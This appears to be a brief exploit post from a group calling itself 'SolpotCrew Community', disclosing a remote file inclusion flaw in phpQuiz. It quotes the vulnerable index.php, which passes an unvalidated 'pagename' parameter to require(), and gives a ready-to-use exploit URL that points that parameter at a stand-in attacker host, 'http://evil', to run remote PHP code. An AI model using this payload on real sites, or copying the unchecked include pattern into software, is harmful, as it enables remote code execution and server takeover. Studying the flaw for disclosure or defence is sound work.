#############################SolpotCrew Community################################
#################################################################################
################################################################################
###############################################################################
Input passed to the "pagename" is not properly verified
before being used to include files. This can be exploited to execute
arbitrary PHP code by including files from local or external resources.
code from index.php
<?php
//include global variables.
include('global.inc.php');
if (empty($pagename)) $pagename=main_menu;
require ("$pagename.php");
?>
exploit : http://somehost/path_to_phpQuiz/index.php?pagename=http://evil
##############################MY LOVE JUST FOR U RIE#########################
######################################E.O.F##################################